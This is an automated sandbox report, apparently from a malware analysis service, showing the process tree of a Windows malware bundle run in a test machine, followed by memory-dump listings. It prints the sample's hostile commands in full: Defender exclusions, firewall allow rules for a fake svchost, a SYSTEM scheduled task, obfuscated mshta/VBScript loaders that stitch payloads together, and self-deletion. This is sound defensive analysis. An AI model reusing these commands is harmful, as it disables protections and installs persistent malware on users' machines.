                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 668
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4444
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 684
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4784
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 736
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:5016
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 896
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4528
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1132
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:4776
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1064
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:3200
                                                                        • C:\Users\Admin\Pictures\Adobe Films\o4zFvO383MuBSBFzFasRpRcw.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\o4zFvO383MuBSBFzFasRpRcw.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:1192
                                                                        • C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1340
                                                                        • C:\Users\Admin\Pictures\Adobe Films\SkUjIk7XlU2rEaq3AGcLz5DJ.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\SkUjIk7XlU2rEaq3AGcLz5DJ.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2700
                                                                          • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                            "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                            4⤵
                                                                              PID:4652
                                                                          • C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe"
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:716
                                                                            • C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe"
                                                                              4⤵
                                                                                PID:5100
                                                                            • C:\Users\Admin\Pictures\Adobe Films\RNKYoCV41gWm_UD_TB15hZtT.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\RNKYoCV41gWm_UD_TB15hZtT.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2016
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 584
                                                                                4⤵
                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                • Program crash
                                                                                PID:4292
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                4⤵
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3536
                                                                            • C:\Users\Admin\Pictures\Adobe Films\MxUfoMMENr6K9eGvv_S09WHN.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\MxUfoMMENr6K9eGvv_S09WHN.exe"
                                                                              3⤵
                                                                                PID:2760
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                  4⤵
                                                                                    PID:4972
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                    4⤵
                                                                                      PID:4696
                                                                                    • C:\Windows\System32\netsh.exe
                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                      4⤵
                                                                                        PID:4608
                                                                                      • C:\Windows\System32\netsh.exe
                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                        4⤵
                                                                                          PID:2944
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:4208
                                                                                        • C:\Windows\System\svchost.exe
                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                          4⤵
                                                                                            PID:4104
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                              5⤵
                                                                                                PID:3800
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                5⤵
                                                                                                  PID:1528
                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                  5⤵
                                                                                                    PID:5984
                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                    5⤵
                                                                                                      PID:1888
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\mqKyqAEhYOnbkk4ykCo3dE0E.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\mqKyqAEhYOnbkk4ykCo3dE0E.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3596
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\MXsrjlSnqJGz0krTCf7GoBvS.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\MXsrjlSnqJGz0krTCf7GoBvS.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4072
                                                                                                  • C:\Users\Admin\AppData\Roaming\6958687.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\6958687.exe"
                                                                                                    4⤵
                                                                                                      PID:1648
                                                                                                    • C:\Users\Admin\AppData\Roaming\4900588.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\4900588.exe"
                                                                                                      4⤵
                                                                                                        PID:4980
                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                          5⤵
                                                                                                            PID:5384
                                                                                                        • C:\Users\Admin\AppData\Roaming\3714813.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\3714813.exe"
                                                                                                          4⤵
                                                                                                            PID:4704
                                                                                                          • C:\Users\Admin\AppData\Roaming\7165569.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\7165569.exe"
                                                                                                            4⤵
                                                                                                              PID:5024
                                                                                                            • C:\Users\Admin\AppData\Roaming\5038743.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\5038743.exe"
                                                                                                              4⤵
                                                                                                                PID:4300
                                                                                                              • C:\Users\Admin\AppData\Roaming\5823422.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\5823422.exe"
                                                                                                                4⤵
                                                                                                                  PID:4600
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\5823422.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\5823422.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                    5⤵
                                                                                                                      PID:5660
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\5823422.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\5823422.exe" ) do taskkill /F /Im "%~Nxk"
                                                                                                                        6⤵
                                                                                                                          PID:5468
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
                                                                                                                            kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
                                                                                                                            7⤵
                                                                                                                              PID:1240
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                                8⤵
                                                                                                                                  PID:3112
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
                                                                                                                                    9⤵
                                                                                                                                      PID:4484
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
                                                                                                                                    8⤵
                                                                                                                                      PID:4840
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
                                                                                                                                        9⤵
                                                                                                                                          PID:5932
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                            10⤵
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:3112
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
                                                                                                                                            10⤵
                                                                                                                                              PID:68
                                                                                                                                            • C:\Windows\SysWOW64\control.exe
                                                                                                                                              control .\GKq1GTV.ZnM
                                                                                                                                              10⤵
                                                                                                                                                PID:5752
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                                  11⤵
                                                                                                                                                    PID:4700
                                                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                                      12⤵
                                                                                                                                                        PID:4952
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\GKq1GTV.ZnM
                                                                                                                                                          13⤵
                                                                                                                                                            PID:2228
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /F /Im "5823422.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5268
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5793737.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5793737.exe"
                                                                                                                                          4⤵
                                                                                                                                            PID:4856
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:4032
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe" & exit
                                                                                                                                            4⤵
                                                                                                                                              PID:1244
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 5
                                                                                                                                                5⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5964
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\tFMNYIvQFvGODFelsb0oU0JY.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\tFMNYIvQFvGODFelsb0oU0JY.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:3364
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\LdPzfZ950SZSXRJ5XiWdvk_f.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\LdPzfZ950SZSXRJ5XiWdvk_f.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:4160
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\KDeGJ7eHa3dxOgWE0DVcTLti.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\KDeGJ7eHa3dxOgWE0DVcTLti.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:4476
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                              4⤵
                                                                                                                                                PID:5768
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4492
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1f4,0x204,0x7ffdaf8edec0,0x7ffdaf8eded0,0x7ffdaf8edee0
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4480
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --mojo-platform-channel-handle=1720 /prefetch:8
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5912
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1672 /prefetch:2
                                                                                                                                                          6⤵
                                                                                                                                                            PID:3808
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --mojo-platform-channel-handle=2104 /prefetch:8
                                                                                                                                                            6⤵
                                                                                                                                                              PID:4160
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2504 /prefetch:1
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5772
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2560 /prefetch:1
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:3044
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1656,1182176382421655808,13703552221525254597,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4492_240051728" --mojo-platform-channel-handle=2916 /prefetch:8
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4988
                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:4640
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4816
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\UZBeoFkS58TudzRHE_hunLoD.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5672
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6028
                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:4440
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:4436
                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:4436
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5892
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:4608
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                          PID:2760
                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:5064
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -im "UZBeoFkS58TudzRHE_hunLoD.exe" -F
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:1656
                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:1096
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                              PID:2156
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DDF5.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DDF5.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5488
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5000

                                                                                                                                                                              Network

                                                                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                                                                              Replay Monitor

                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                              Downloads

                                                                                                                                                                              • memory/352-210-0x000001DB0EBF0000-0x000001DB0EBF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/352-224-0x000001DB0F240000-0x000001DB0F2B2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/352-211-0x000001DB0EBF0000-0x000001DB0EBF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/484-233-0x00000210D57D0000-0x00000210D5842000-memory.dmp

